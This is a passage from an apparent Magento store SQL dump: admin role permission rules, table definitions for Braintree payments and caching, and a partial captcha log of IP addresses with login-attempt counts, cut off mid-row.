cs::advanced_reporting',NULL,'deny'),(152,3,'Magento_Analytics::bi_essentials',NULL,'deny'),(153,3,'Magento_Backend::stores',NULL,'deny'),(154,3,'Magento_Backend::stores_settings',NULL,'deny'),(155,3,'Magento_Backend::store',NULL,'deny'),(156,3,'Magento_Config::config',NULL,'deny'),(157,3,'Magento_Cms::config_cms',NULL,'deny'),(158,3,'Plazathemes_Blog::config_blog',NULL,'deny'),(159,3,'Magento_GoogleAnalytics::google',NULL,'deny'),(160,3,'Magento_Newsletter::newsletter',NULL,'deny'),(161,3,'Magento_Sales::fraud_protection',NULL,'deny'),(162,3,'Dotdigitalgroup_Email::config',NULL,'deny'),(163,3,'Plazathemes_Bannerslider::config_bannerslider',NULL,'deny'),(164,3,'Plazathemes_Bestsellerproduct::test_config',NULL,'deny'),(165,3,'Plazathemes_Brandslider::config_brandslider',NULL,'deny'),(166,3,'Magento_Contact::contact',NULL,'deny'),(167,3,'Plazathemes_Categorytab::test_config',NULL,'deny'),(168,3,'Plazathemes_Newproductslider::test_config',NULL,'deny'),(169,3,'Plazathemes_Newsletterpopup::test_config',NULL,'deny'),(170,3,'Plazathemes_Producttab::test_config',NULL,'deny'),(171,3,'Plazathemes_Recentproductslider::config_recentproductslider',NULL,'deny'),(172,3,'Plazathemes_Saleproductslider::test_config',NULL,'deny'),(173,3,'Plazathemes_Testimonial::config_testimonial',NULL,'deny'),(174,3,'Magento_Downloadable::downloadable',NULL,'deny'),(175,3,'Plazathemes_Themeoptions::config',NULL,'deny'),(176,3,'Magento_Payment::payment',NULL,'deny'),(177,3,'Magento_Catalog::config_catalog',NULL,'deny'),(178,3,'Magento_CatalogSearch::config_catalog_search',NULL,'deny'),(179,3,'Magento_CatalogInventory::cataloginventory',NULL,'deny'),(180,3,'Magento_Payment::payment_services',NULL,'deny'),(181,3,'Magento_Shipping::carriers',NULL,'deny'),(182,3,'Magento_Shipping::config_shipping',NULL,'deny'),(183,3,'Magento_Shipping::shipping_policy',NULL,'deny'),(184,3,'Magento_Multishipping::config_multishipping',NULL,'deny'),(185,3,'Magento_Config::config_general',NULL,'deny'),(186,3,'Magento_Config::web',NULL,'deny'),(187,3,'Magento_Config::config_design',NULL,'deny'),(188,3,'MSP_SecuritySuite::config',NULL,'deny'),(189,3,'MSP_ReCaptcha::config',NULL,'deny'),(190,3,'Magento_Customer::config_customer',NULL,'deny'),(191,3,'Magento_Paypal::paypal',NULL,'deny'),(192,3,'Magento_Tax::config_tax',NULL,'deny'),(193,3,'Magento_Checkout::checkout',NULL,'deny'),(194,3,'Magento_Persistent::persistent',NULL,'deny'),(195,3,'Magento_Sales::config_sales',NULL,'deny'),(196,3,'Magento_Sales::sales_email',NULL,'deny'),(197,3,'Magento_Sales::sales_pdf',NULL,'deny'),(198,3,'Magento_Sitemap::config_sitemap',NULL,'deny'),(199,3,'Magento_Reports::reports',NULL,'deny'),(200,3,'Plazathemes_InstagramGallery::config_instagramgallery',NULL,'deny'),(201,3,'Magento_Wishlist::config_wishlist',NULL,'deny'),(202,3,'Magento_Config::config_system',NULL,'deny'),(203,3,'Magento_Config::advanced',NULL,'deny'),(204,3,'Magento_SalesRule::config_promo',NULL,'deny'),(205,3,'Magento_Config::trans_email',NULL,'deny'),(206,3,'Magento_Config::config_admin',NULL,'deny'),(207,3,'Plazathemes_Layerednavigation::config_ajaxlayerednavigation',NULL,'deny'),(208,3,'Magento_Config::dev',NULL,'deny'),(209,3,'Plazathemes_Quickview::config_quickview',NULL,'deny'),(210,3,'Magento_Config::currency',NULL,'deny'),(211,3,'Magento_Rss::rss',NULL,'deny'),(212,3,'Magento_Config::sendfriend',NULL,'deny'),(213,3,'Magento_Analytics::analytics_settings',NULL,'deny'),(214,3,'Magento_NewRelicReporting::config_newrelicreporting',NULL,'deny'),(215,3,'Magento_CheckoutAgreements::checkoutagreement',NULL,'deny'),(216,3,'Magento_Sales::order_statuses',NULL,'deny'),(217,3,'Temando_Shipping::shipping',NULL,'deny'),(218,3,'Temando_Shipping::carriers',NULL,'deny'),(219,3,'Temando_Shipping::locations',NULL,'deny'),(220,3,'Temando_Shipping::packaging',NULL,'deny'),(221,3,'Temando_Shipping::portal',NULL,'deny'),(222,3,'Magento_Tax::manage_tax',NULL,'deny'),(223,3,'Magento_CurrencySymbol::system_currency',NULL,'deny'),(224,3,'Magento_CurrencySymbol::currency_rates',NULL,'deny'),(225,3,'Magento_CurrencySymbol::symbols',NULL,'deny'),(226,3,'Magento_Backend::stores_attributes',NULL,'deny'),(227,3,'Magento_Catalog::attributes_attributes',NULL,'deny'),(228,3,'Magento_Catalog::update_attributes',NULL,'deny'),(229,3,'Magento_Catalog::sets',NULL,'deny'),(230,3,'Magento_Review::ratings',NULL,'deny'),(231,3,'Magento_Swatches::iframe',NULL,'deny'),(232,3,'Magento_Backend::stores_other_settings',NULL,'deny'),(233,3,'Magento_Backend::system',NULL,'deny'),(234,3,'Magento_Backend::convert',NULL,'deny'),(235,3,'Magento_ImportExport::import',NULL,'deny'),(236,3,'Magento_ImportExport::export',NULL,'deny'),(237,3,'Magento_TaxImportExport::import_export',NULL,'deny'),(238,3,'Magento_ImportExport::history',NULL,'deny'),(239,3,'Magento_Backend::extensions',NULL,'deny'),(240,3,'Magento_Backend::local',NULL,'deny'),(241,3,'Magento_Backend::custom',NULL,'deny'),(242,3,'Magento_Integration::extensions',NULL,'deny'),(243,3,'Magento_Integration::integrations',NULL,'deny'),(244,3,'Magento_Backend::tools',NULL,'deny'),(245,3,'Magento_Backend::cache',NULL,'deny'),(246,3,'Magento_Backend::main_actions',NULL,'deny'),(247,3,'Magento_Backend::flush_cache_storage',NULL,'deny'),(248,3,'Magento_Backend::flush_magento_cache',NULL,'deny'),(249,3,'Magento_Backend::mass_actions',NULL,'deny'),(250,3,'Magento_Backend::toggling_cache_type',NULL,'deny'),(251,3,'Magento_Backend::refresh_cache_type',NULL,'deny'),(252,3,'Magento_Backend::additional_cache_management',NULL,'deny'),(253,3,'Magento_Backend::flush_catalog_images',NULL,'deny'),(254,3,'Magento_Backend::flush_js_css',NULL,'deny'),(255,3,'Magento_Backend::flush_static_files',NULL,'deny'),(256,3,'Magento_Backend::setup_wizard',NULL,'deny'),(257,3,'Magento_Backup::backup',NULL,'deny'),(258,3,'Magento_Backup::rollback',NULL,'deny'),(259,3,'Magento_Indexer::index',NULL,'deny'),(260,3,'Magento_Indexer::changeMode',NULL,'deny'),(261,3,'Magento_User::acl',NULL,'deny'),(262,3,'Magento_User::acl_users',NULL,'deny'),(263,3,'Magento_User::locks',NULL,'deny'),(264,3,'Magento_User::acl_roles',NULL,'deny'),(265,3,'Magento_Backend::system_other_settings',NULL,'deny'),(266,3,'Magento_AdminNotification::adminnotification',NULL,'deny'),(267,3,'Magento_AdminNotification::show_toolbar',NULL,'deny'),(268,3,'Magento_AdminNotification::show_list',NULL,'deny'),(269,3,'Magento_AdminNotification::mark_as_read',NULL,'deny'),(270,3,'Magento_AdminNotification::adminnotification_remove',NULL,'deny'),(271,3,'Magento_Variable::variable',NULL,'deny'),(272,3,'Magento_EncryptionKey::crypt_key',NULL,'deny'),(273,3,'Magento_Backend::global_search',NULL,'deny'),(274,3,'Magento_MediaGalleryUiApi::insert_assets',NULL,'allow'),(275,3,'Magento_MediaGalleryUiApi::upload_assets',NULL,'allow'),(276,3,'Magento_MediaGalleryUiApi::edit_assets',NULL,'allow'),(277,3,'Magento_MediaGalleryUiApi::delete_assets',NULL,'allow'),(278,3,'Magento_MediaGalleryUiApi::create_folder',NULL,'allow'),(279,3,'Magento_MediaGalleryUiApi::delete_folder',NULL,'allow');

--
-- Table structure for table `braintree_credit_prices`
--

CREATE TABLE `braintree_credit_prices` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Row ID',
  `product_id` int(10) unsigned NOT NULL COMMENT 'Product Id',
  `term` int(11) NOT NULL COMMENT 'Credit Term',
  `monthly_payment` decimal(12,2) NOT NULL COMMENT 'Monthly Payment',
  `instalment_rate` decimal(12,2) NOT NULL COMMENT 'Instalment Rate',
  `cost_of_purchase` decimal(12,2) NOT NULL COMMENT 'Cost of purchase',
  `total_inc_interest` decimal(12,2) NOT NULL COMMENT 'Total Inc Interest',
  PRIMARY KEY (`id`),
  UNIQUE KEY `BRAINTREE_CREDIT_PRICES_PRODUCT_ID_TERM` (`product_id`,`term`),
  KEY `BRAINTREE_CREDIT_PRICES_PRODUCT_ID` (`product_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Braintree credit rates';

--
-- Dumping data for table `braintree_credit_prices`
--


--
-- Table structure for table `braintree_transaction_details`
--

CREATE TABLE `braintree_transaction_details` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `order_id` int(10) unsigned NOT NULL COMMENT 'Order Id',
  `transaction_source` varchar(12) DEFAULT NULL COMMENT 'Transaction Source',
  PRIMARY KEY (`entity_id`),
  KEY `BRAINTREE_TRANSACTION_DETAILS_ORDER_ID` (`order_id`),
  CONSTRAINT `BRAINTREE_TRANSACTION_DETAILS_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Braintree transaction details table';

--
-- Dumping data for table `braintree_transaction_details`
--


--
-- Table structure for table `cache`
--

CREATE TABLE `cache` (
  `id` varchar(200) NOT NULL COMMENT 'Cache Id',
  `data` mediumblob DEFAULT NULL COMMENT 'Cache Data',
  `create_time` int(11) DEFAULT NULL COMMENT 'Cache Creation Time',
  `update_time` int(11) DEFAULT NULL COMMENT 'Time of Cache Updating',
  `expire_time` int(11) DEFAULT NULL COMMENT 'Cache Expiration Time',
  PRIMARY KEY (`id`),
  KEY `CACHE_EXPIRE_TIME` (`expire_time`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Caches';

--
-- Dumping data for table `cache`
--


--
-- Table structure for table `cache_tag`
--

CREATE TABLE `cache_tag` (
  `tag` varchar(100) NOT NULL COMMENT 'Tag',
  `cache_id` varchar(200) NOT NULL COMMENT 'Cache Id',
  PRIMARY KEY (`tag`,`cache_id`),
  KEY `CACHE_TAG_CACHE_ID` (`cache_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Tag Caches';

--
-- Dumping data for table `cache_tag`
--


--
-- Table structure for table `captcha_log`
--

CREATE TABLE `captcha_log` (
  `type` varchar(32) NOT NULL COMMENT 'Type',
  `value` varchar(255) NOT NULL COMMENT 'Value',
  `count` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Count',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Update Time',
  PRIMARY KEY (`type`,`value`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Count Login Attempts';

--
-- Dumping data for table `captcha_log`
--

INSERT INTO `captcha_log` VALUES ('1','1.11.62.186',6,'2022-03-23 10:16:36'),('1','1.117.241.14',2,'2022-04-22 10:55:03'),('1','101.33.228.162',2,'2022-04-20 22:53:35'),('1','101.34.28.245',2,'2022-04-25 23:50:01'),('1','102.119.187.70',6,'2020-11-11 18:46:14'),('1','102.129.84.118',9,'2022-04-29 18:53:25'),('1','103.104.29.43',7,'2022-03-23 11:21:33'),('1','103.143.117.75',4,'2022-04-20 18:34:11'),('1','103.143.190.60',6,'2022-04-28 15:55:35'),('1','103.147.142.76',9,'2022-03-17 15:50:42'),('1','103.152.41.232',4,'2022-03-31 11:07:21'),('1','103.152.41.238',2,'2022-04-18 09:07:12'),('1','103.164.211.228',2,'2022-02-01 09:46:05'),('1','103.215.149.69',4,'2022-04-20 04:32:41'),('1','103.245.195.45',13,'2022-04-24 19:05:17'),('1','103.43.184.13',12,'2022-04-16 09:40:50'),('1','103.92.36.211',8,'2022-04-17 02:34:43'),('1','103.94.96.116',5,'2022-04-17 12:46:29'),('1','104.131.59.165',2,'2022-04-02 15:51:36'),('1','104.230.203.41',2,'2022-03-14 20:23:55'),('1','104.236.248.101',11,'2022-03-22 20:54:24'),('1','104.248.93.95',12,'2022-04-07 04:50:25'),('1','106.41.92.162',6,'2022-04-29 01:39:23'),('1','107.203.46.129',12,'2022-03-13 09:13:40'),('1','108.188.96.139',12,'2022-04-24 14:09:26'),('1','109.226.75.123',12,'2022-04-17 05:09:09'),('1','109.94.76.110',13,'2022-04-24 15:06:52'),('1','110.168.65.106',7,'2022-03-23 22:06:41'),('1','110.169.175.54',12,'2022-04-13 14:27:00'),('1','110.38.131.241',7,'2022-03-28 19:26:12'),('1','110.38.138.102',6,'2022-04-09 21:26:02'),('1','110.39.190.2',12,'2022-04-08 13:18:08'),('1','110.77.196.6',4,'2022-04-27 08:40:13'),('1','111.197.128.203',10,'2022-04-06 19:07:44'),('1','112.195.165.54',11,'2022-04-07 13:22:11'),('1','112.30.60.13',6,'2022-04-24 14:23:03'),('1','112.31.167.7',4,'2022-03-23 04:43:49'),('1','112.91.132.3',6,'2022-04-20 01:27:27'),('1','113.160.132.162',2,'2022-04-27 08:15:05'),('1','113.161.220.98',12,'2022-03-09 05:06:27'),('1','113.161.88.235',1,'2022-03-22 08:38:31'),('1','113.164.165.60',2,'2022-04-30 12:36:05'),('1','113.172.100.94',2,'2020-11-11 18:43:21'),('1','113.173.1.196',10,'2022-04-08 15:24:54'),('1','113.173.144.109',12,'2022-03-16 19:12:09'),('1','113.173.175.248',12,'2022-04-28 20:26:47'),('1','113.173.176.232',1,'2022-02-23 09:38:13'),('1','113.190.65.83',11,'2022-04-26 12:58:55'),('1','114.79.162.222',8,'2022-04-20 04:36:46'),('1','115.200.188.20',11,'2022-03-19 11:42:43'),('1','115.46.88.186',2,'2022-02-12 15:43:33'),('1','115.66.132.202',2,'2022-02-12 08:09:08'),('1','115.79.200.251',12,'2022-03-14 23:18:10'),('1','115.87.212.66',2,'2022-04-29 13:25:54'),('1','116.111.31.16',10,'2020-09-28 05:50:13'),('1','116.48.139.52',6,'2022-04-11 10:50:14'),('1','116.63.178.36',2,'2022-04-02 18:29:29'),('1','117.158.73.58',10,'2022-04-29 00:44:41'),('1','117.198.204.25',10,'2022-03-25 10:50:50'),('1','117.50.175.83',7,'2022-04-27 18:12:00'),('1','119.42.67.20',12,'2022-03-13 21:46:17'),('1','120.211.22.110',6,'2022-03-21 21:25:16'),('1','121.141.197.169',12,'2022-04-19 17:06:00'),('1','121.5.136.97',8,'2022-04-26 22:20:44'),('1','122.161.243.175',2,'2021-10-12 04:23:59'),('1','123.16.50.212',12,'2022-04-30 10:03:04'),('1','123.9.249.254',11,'2022-04-24 18:07:14'),('1','124.121.162.199',8,'2022-04-24 19:49:56'),('1','124.121.187.180',12,'2022-04-20 23:52:40'),('1','124.121.191.17',10,'2022-04-25 13:50:47'),('1','124.122.231.154',10,'2022-04-09 01:55:05'),('1','124.122.65.30',4,'2022-04-08 01:02:43'),('1','124.192.227.119',4,'2022-04-10 10:00:24'),('1','125.143.53.2',8,'2022-04-28 00:06:32'),('1','128.127.105.184',2,'2020-12-11 17:41:05'),('1','131.196.104.180',3,'2022-03-26 23:48:56'),('1','138.19.167.49',8,'2022-04-13 19:45:36'),('1','138.207.154.32',10,'2022-03-21 22:45:29'),('1','138.97.66.129',1,'2022-04-19 04:30:21'),('1','139.194.124.62',10,'2022-04-18 04:32:04'),('1','139.5.159.117',11,'2022-03-20 08:35:49'),('1','14.161.43.120',11,'2022-04-25 10:14:24'),('1','14.162.179.66',4,'2022-04-25 20:47:23'),('1','14.186.255.47',10,'2022-04-24 20:32:25'),('1','14.226.235.51',5,'2022-04-25 20:28:57'),('1','14.29.168.238',2,'2022-02-12 08:07:28'),('1','141.101.188.8',6,'2022-04-05 01:36:52'),('1','141.164.96.8',11,'2022-04-08 17:49:24'),('1','146.196.121.53',8,'2022-03-20 09:11:20'),('1','150.230.92.117',12,'2022-03-22 21:14:52'),('1','157.245.87.17',7,'2022-04-25 17:34:35'),('1','157.41.159.222',2,'2020-09-07 06:48:15'),('1','159.223.169.76',10,'2022-03-15 06:28:05'),('1','168.196.248.120',2,'2022-04-30 00:34:00'),('1','170.233.117.132',8,'2022-03-23 22:19:59'),('1','171.100.116.83',6,'2022-04-17 19:16:42'),('1','171.100.219.232',8,'2022-03-10 09:23:11'),('1','171.100.221.86',11,'2022-04-04 21:59:22'),('1','171.101.225.250',2,'2022-04-17 03:26:11'),('1','171.228.151.100',3,'2022-03-17 13:15:58'),('1','171.238.215.77',2,'2022-04-22 07:51:31'),('1','171.35.128.155',12,'2022-04-07 07:09:50'),('1','171.6.113.180',10,'2022-04-10 19:55:36'),('1','171.97.123.26',3,'2022-03-28 03:28:48'),('1','171.97.128.9',2,'2022-03-18 12:59:18'),('1','171.97.190.53',2,'2022-03-20 02:24:15'),('1','171.97.235.220',12,'2022-03-11 23:26:31'),('1','171.97.239.33',4,'2022-04-18 22:17:13'),('1','171.97.53.18',11,'2022-03-31 02:08:21'),('1','171.97.91.254',4,'2022-04-22 04:30:50'),('1','172.91.97.228',2,'2022-03-16 00:16:37'),('1','173.212.206.158',12,'2020-10-02 15:47:23'),('1','176.195.239.2',4,'2022-04-29 00:49:11'),('1','177.106.160.145',9,'2022-04-25 00:33:51'),('1','177.154.192.101',12,'2022-03-12 12:28:09'),('1','177.184.180.214',11,'2022-03-12 14:41:34'),('1','177.200.35.244',8,'2022-04-28 04:18:32'),('1','177.238.108.81',9,'2022-03-22 20:19:08'),('1','177.72.85.13',6,'2022-04-16 13:08:55'),('1','177.75.248.63',12,'2022-03-12 18:44:28'),('1','177.93.50.38',1,'2022-03-30 08:22:59'),('1','178.214.85.71',3,'2022-04-15 05:27:38'),('1','179.96.205.191',12,'2022-04-10 13:01:24'),('1','180.168.208.102',6,'2022-04-25 09:22:14'),('1','181.117.247.23',12,'2022-03-23 09:37:38'),('1','181.15.102.24',8,'2022-03-25 23:26:53'),('1','181.66.131.28',2,'2020-11-03 09:18:51'),('1','182.176.211.2',6,'2020-10-28 04:20:16'),('1','182.73.88.226',2,'2022-03-22 08:53:51'),('1','182.76.214.254',7,'2022-04-21 02:15:43'),('1','182.76.22.54',2,'2020-09-06 00:30:52'),('1','182.76.42.110',4,'2020-10-28 04:15:24'),('1','183.88.98.55',12,'2022-04-10 02:02:48'),('1','183.89.154.115',5,'2022-04-25 03:46:25'),('1','185.131.12.123',2,'2022-04-29 13:01:05'),('1','185.151.147.13',6,'2022-04-24 19:22:51'),('1','185.191.171.1',127,'2022-04-27 20:20:36'),('1','185.191.171.10',122,'2022-04-27 21:47:35'),('1','185.191.171.11',97,'2022-04-27 00:28:38'),('1','185.191.171.12',103,'2022-04-28 03:26:50'),('1','185.191.171.13',110,'2022-04-17 23:51:42'),('1','185.191.171.14',98,'2022-04-28 18:14:05'),('1','185.191.171.15',120,'2022-04-28 10:38:53'),('1','185.191.171.16',106,'2022-04-22 14:37:51'),('1','185.191.171.17',103,'2022-04-24 07:17:03'),('1','185.191.171.18',124,'2022-04-26 23:46:07'),('1','185.191.171.19',108,'2022-04-30 07:26:41'),('1','185.191.171.2',120,'2022-04-27 03:31:09'),('1','185.191.171.20',113,'2022-04-29 06:45:27'),('1','185.191.171.21',141,'2022-04-27 14:40:50'),('1','185.191.171.22',133,'2022-04-19 03:52:19'),('1','185.191.171.23',130,'2022-04-27 14:46:30'),('1','185.191.171.24',140,'2022-04-27 18:13:45'),('1','185.191.171.25',134,'2022-04-30 03:36:19'),('1','185.191.171.26',98,'2022-04-28 16:26:53'),('1','185.191.171.3',114,'2022-04-20 14:41:39'),('1','185.191.171.33',131,'2022-04-27 20:08:01'),('1','185.191.171.34',129,'2022-04-27 16:35:37'),('1','185.191.171.35',48,'2022-04-28 11:39:18'),('1','185.191.171.36',167,'2022-04-26 11:24:24'),('1','185.191.171.37',149,'2022-04-24 22:59:20'),('1','185.191.171.38',139,'2022-04-27 07:30:40'),('1','185.191.171.39',142,'2022-04-29 07:17:59'),('1','185.191.171.4',130,'2022-04-28 16:44:16'),('1','185.191.171.40',46,'2022-04-27 13:33:33'),('1','185.191.171.41',114,'2022-04-28 17:54:29'),('1','185.191.171.42',37,'2022-04-30 06:02:20'),('1','185.191.171.43',127,'2022-04-26 05:28:53'),('1','185.191.171.44',137,'2022-04-27 18:45:56'),('1','185.191.171.45',133,'2022-04-23 17:36:45'),('1','185.191.171.5',141,'2022-04-29 00:08:50'),('1','185.191.171.6',49,'2022-04-24 21:36:14'),('1','185.191.171.7',115,'2022-04-25 17:16:40'),('1','185.191.171.8',132,'2022-04-18 18:19:48'),('1','185.191.171.9',45,'2022-04-19 04:46:28'),('1','185.206.117.84',1,'2022-02-21 14:08:44'),('1','185.208.159.162',1,'2020-09-04 10:13:11'),('1','185.214.164.10',63,'2020-09-30 15:08:56'),('1','185.232.233.205',12,'2022-04-22 02:24:23'),('1','185.78.167.200',2,'2022-04-24 11:25:36'),('1','186.154.80.59',2,'2022-04-19 12:11:57'),('1','186.178.59.123',1,'2022-03-29 09:25:17'),('1','186.179.100.193',12,'2022-03-16 02:32:38'),('1','186.238.31.10',12,'2022-04-24 13:01:44'),('1','186.239.98.190',11,'2022-04-13 16:54:24'),('1','186.73.147.132',2,'2022-02-21 18:55:42'),('1','187.0.45.87',5,'2022-03-15 19:14:38'),('1','187.108.194.245',12,'2022-03-15 16:24:04'),('1','187.160.2.187',12,'2022-04-27 21:21:16'),('1','187.188.34.138',4,'2022-04-22 04:28:04'),('1','187.188.50.200',4,'2022-04-16 09:36:27'),('1','187.190.233.7',21,'2022-04-24 20:41:48'),('1','187.252.146.40',12,'2022-04-09 17:56:45'),('1','187.9.186.158',6,'2022-04-06 22:31:50'),('1','187.94.16.59',12,'2022-04-07 11:19:56'),('1','188.148.228.48',4,'2022-04-10 20:34:21'),('1','188.248.85.169',12,'2022-03-24 11:25:04'),('1','189.109.53.198',2,'2022-03-16 01:02:46'),('1','189.127.233.254',12,'2020-10-15 06:35:54'),('1','189.127.239.27',10,'2022-03-10 04:51:02'),('1','189.15.162.250',2,'2022-02-14 04:25:32'),('1','189.44.20.193',4,'2022-04-08 19:17:00'),('1','189.51.118.58',12,'2022-04-14 10:03:13'),('1','189.51.96.141',10,'2020-10-07 23:55:59'),('1','189.57.3.90',1,'2022-04-20 12:18:08'),('1','190.191.97.207',10,'2022-04-18 11:03:48'),('1','190.197.112.70',11,'2022-04-19 04:09:19'),('1','190.197.113.44',12,'2022-04-27 05:47:34'),('1','190.214.77.18',4,'2022-04-25 22:58:50'),('1','190.214.78.127',3,'2022-04-16 01:13:20'),('1','190.89.165.187',12,'2022-03-18 19:32:26'),('1','190.96.56.218',2,'2022-04-26 02:16:47'),('1','193.164.133.65',12,'2022-03-18 22:20:38'),('1','194.26.29.143',4023,'2022-04-23 09:12:46'),('1','194.26.29.195',3,'2021-02-14 12:25:28'),('1','194.4.42.10',6,'2022-03-15 19:48:07'),('1','194.53.176.23',12,'2020-11-18 20:32:07'),('1','195.174.92.75',2,'2022-04-24 13:25:01'),('1','197.251.193.218',12,'2022-03-23 10:28:21'),('1','197.47.22.106',12,'2022-04-26 07:58:06'),('1','2.56.139.203',2,'2022-03-31 09:32:34'),('1','2.56.139.215',1,'2022-04-06 21:14:52'),('1','2.56.139.220',4,'2022-04-04 21:16:42'),('1','2.56.139.246',2,'2022-03-30 20:56:48'),('1','2.56.139.253',2,'2022-03-20 17:07:11'),('1','2.57.151.205',2,'2022-03-30 09:14:52'),('1','2.57.151.208',5,'2022-04-07 13:08:34'),('1','2.57.151.210',4,'2022-03-25 17:07:11'),('1','2.57.151.238',2,'2022-03-23 20:40:14'),('1','2.57.151.240',2,'2022-03-29 09:10:33'),('1','200.239.36.181',2,'2022-04-08 11:01:31'),('1','200.34.232.61',7,'2022-04-26 15:42:12'),('1','200.73.128.165',12,'2022-04-17 14:49:39'),('1','200.73.131.213',10,'2020-11-03 09:17:38'),('1','201.160.58.206',12,'2022-03-12 06:53:15'),('1','201.166.226.70',11,'2022-04-19 20:06:44'),('1','201.167.58.55',6,'2022-04-19 15:54:00'),('1','201.63.207.218',5,'2022-04-21 01:39:39'),('1','202.175.178.226',2,'2022-04-17 00:28:02'),('1','203.110.167.231',8,'2022-04-17 22:34:29'),('1','203.210.209.85',10,'2022-04-20 16:45:45'),('1','206.54.206.5',12,'2022-04-19 13:11:24'),('1','208.52.182.156',12,'2022-04-19 00:36:06'),('1','209.14.136.121',2,'2022-04-20 11:44:15'),('1','209.14.69.168',2,'2022-04-26 04:56:51'),('1','209.146.46.227',2,'2022-04-19 05:53:56'),('1','209.240.185.13',12,'2022-03-10 05:40:39'),('1','210.131.181.13',2,'2022-04-07 21:22:44'),('1','210.183.81.17',6,'2022-04-15 21:57:18'),('1','211.186.132.162',3,'2022-03-17 17:06:36'),('1','211.250.233.56',2,'2022-03-12 11:20:57'),('1','213.108.185.204',12,'2022-04-21 13:29:45'),('1','213.152.161.85',3,'2021-01-25 16:23:14'),('1','213.166.94.205',2,'2022-03-23 03:54:00'),('1','213.166.94.233',2,'2022-03-24 05:13:47'),('1','213.166.94.240',4,'2022-04-07 21:02:51'),('1','213.166.94.250',3,'2022-04-07 06:21:44'),('1','213.166.94.252',2,'2022-03-26 11:01:56'),('1','217.128.59.115',4,'2022-04-22 01:11:10'),('1','218.206.139.50',4,'2022-03-15 17:10:04'),('1','218.207.170.134',2,'2022-04-18 10:23:02'),('1','218.87.159.88',12,'2022-03-11 18:52:44'),('1','218.93.12.126',6,'2022-03-23 20:18:16'),('1','220.143.84.119',12,'2022-03-13 19:14:18'),('1','220.178.2.114',2,'2022-04-28 02:33:11'),('1','221.11.149.55',10,'2022-04-19 04:34:04'),('1','221.12.137.6',6,'2022-04-24 13:54:47'),('1','221.135.66.204',2,'2022-04-15 13:44:09'),('1','221.193.240.74',4,'2022-04-21 04:32:44'),('1','221.210.80.136',7,'2022-04-21 16:58:52'),('1','221.224.110.234',1,'2022-04-14 19:33:40'),('1','222.128.48.197',8,'2022-03-23 06:40:51'),('1','222.134.240.91',10,'2022-03-25 03:45:02'),('1','222.253.95.60',6,'2022-03-27 13:26:29'),('1','223.197.142.129',10,'2022-03-09 13:59:43'),('1','24.232.229.26',2,'2022-04-29 09:46:10'),('1','24.241.232.26',9,'2022-03-15 18:38:37'),('1','27.128.194.139',4,'2022-04-25 09:19:47'),('1','27.42.163.155',2,'2022-03-10 00:24:01'),('1','31.132.220.2',1,'2021-03-11 13:24:07'),('1','31.186.53.198',10,'2020-11-28 15:28:59'),('1','31.47.11.152',10,'2022-04-21 21:32:45'),('1','36.134.78.213',5,'2022-03-25 20:58:46'),('1','36.33.209.171',2,'2022-02-12 08:10:45'),('1','36.37.165.128',2,'2022-03-30 15:44:12'),('1','37.120.194.43',1,'2021-01-26 10:07:01'),('1','37.120.194.45',1,'2021-01-26 07:58:09'),('1','37.120.194.46',4,'2021-01-31 02:22:41'),('1','37.120.194.55',5,'2021-01-28 11:28:14'),('1','37.120.194.60',2,'2021-01-27 04:22:30'),('1','37.120.203.71',1,'2021-07-12 06:56:04'),('1','37.17.14.121',4,'2022-03-27 14:31:10'),('1','37.25.37.207',12,'2022-04-09 07:37:36'),('1','41.215.100.173',8,'2022-04-09 09:21:13'),('1','41.218.224.62',2,'2022-04-24 15:41:14'),('1','41.58.159.211',4,'2020-09-06 00:28:23'),('1','42.228.7.2',8,'2022-04-24 23:45:47'),('1','42.63.12.150',12,'2022-03-14 11:29:48'),('1','45.141.86.187',24,'2021-12-14 07:46:08'),('1','45.146.26.102',1,'2022-04-04 05:02:37'),('1','45.146.26.106',1,'2022-04-04 13:01:11'),('1','45.146.26.60',2,'2022-04-16 01:04:42'),('1','45.146.26.62',2,'2022-03-22 18:55:44'),('1','45.165.170.54',10,'2022-03-10 19:01:11'),('1','45.174.88.13',4,'2022-03-23 22:06:24'),('1','45.224.105.107',2,'2022-03-14 19:22:32'),('1','45.224.105.42',12,'2022-03-19 21:03:02'),('1','45.224.105.54',8,'2022-03-29 02:38:53'),('1','45.232.3.105',9,'2022-04-24 15:44:06'),('1','46.19.139.34',9660,'2020-09-01 11:19:21'),('1','46.191.196.195',4,'2022-04-15 17:24:50'),('1','46.229.168.129',3,'2020-09-06 11:36:55'),('1','46.229.168.130',3,'2020-09-06 17:33:27'),('1','46.229.168.141',2,'2020-09-06 13:57:27'),('1','46.229.168.144',2,'2020-09-07 02:25:30'),('1','46.229.168.145',2,'2020-09-05 14:01:21'),('1','46.229.168.146',3,'2020-09-06 22:33:58'),('1','46.229.168.149',1,'2020-09-05 20:15:40'),('1','46.229.168.151',3,'2020-09-07 01:02:09'),('1','46.229.168.152',3,'2020-09-06 00:27:57'),('1','46.229.168.153',2,'2020-09-07 11:56:31'),('1','46.229.168.154',3,'2020-09-07 08:05:14'),('1','46.229.168.161',4,'2020-09-07 05:20:50'),('1','46.229.168.163',1,'2020-08-31 17:17:06'),('1','47.196.65.22',2,'2022-04-08 15:30:24'),('1','49.36.138.136',3,'2020-06-20 07:08:26'),('1','49.36.142.20',1,'2020-06-23 12:07:10'),('1','5.188.62.140',60,'2022-04-26 08:16:29'),('1','5.188.62.21',52,'2022-04-20 16:19:15'),('1','5.188.62.214',28,'2022-03-29 22:15:36'),('1','5.188.62.76',50,'2022-04-12 08:52:24'),('1','5.228.185.198',6,'2022-04-24 11:28:15'),('1','5.61.49.169',133,'2022-04-19 11:49:02'),('1','50.4.154.171',4,'2022-04-04 02:29:57'),('1','52.247.25.197',2,'2022-04-24 